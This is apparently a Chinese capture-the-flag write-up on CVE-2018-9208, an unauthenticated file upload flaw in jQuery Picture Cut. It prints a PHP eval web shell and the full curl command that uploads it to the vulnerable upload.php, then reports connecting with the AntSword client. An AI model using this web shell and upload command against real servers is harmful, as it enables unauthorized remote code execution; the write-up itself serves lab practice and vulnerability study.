jquery-picture-cut 任意文件上传(CVE-2018-9208)

目录

1、漏洞描述

2、访问ip:port

3、一句话木马:exploit.php

4、上传一句话木马

5、中国蚁剑连接成功

6、拿到flag


1、漏洞描述

jQuery是一个快速、简洁的JavaScript框架,是继Prototype之后又一个优秀的JavaScript代码库(框架)于2006年1月由John Resig发布。 jQuery Picture Cut <= v1.1Beta 中未经身份验证的任意文件上传漏洞 复现参考链接:http://www.vapidlabs.com/advisory.php?v=207

2、访问ip:port

3、一句话木马:exploit.php

复制代码
<?php @eval($_POST['a']);?>

4、上传一句话木马

复制代码
curl -F "inputOfFile=file" -F "request=upload" -F "enableResize=0" -F "minimumWidthToResize=0" -F "minimumHeightToResize=0" -F "folderOnServer=/" -F "imageNameRandom=1" -F "maximumSize=10000" -F "enableMaximumSize=0" -F "file=@exploit.php" http://IP:PORT/jquery-picture-cut/src/php/upload.php

5、中国蚁剑连接成功

6、拿到flag

相关推荐
Mintopia8 小时前
🚀 Next.js API 压力测试:一场前端与后端的“极限拉扯”
前端·后端·全栈
Mintopia8 小时前
🛡️ 对抗性攻击与防御:WebAI模型的安全加固技术
前端·javascript·aigc
庙堂龙吟奈我何8 小时前
qiankun知识点
前端
Jeled9 小时前
Android 集成指南:Google 登录、Facebook 登录 与 Firebase 深入接入(实战)
android·kotlin·android studio·memcached·facebook
SoaringHeart9 小时前
Flutter封装:原生路由管理极简封装 AppNavigator
前端·flutter
menu9 小时前
AI给我的建议
前端
张可爱9 小时前
20251018-JavaScript八股文整理版(上篇)
前端
用户099 小时前
Android唤醒锁优化指南
android·面试·kotlin
小小测试开发9 小时前
Python Arrow库:告别datetime繁琐,优雅处理时间与时区
开发语言·前端·python
自律版Zz9 小时前
手写 Promise.resolve:从使用场景到实现的完整推导
前端·javascript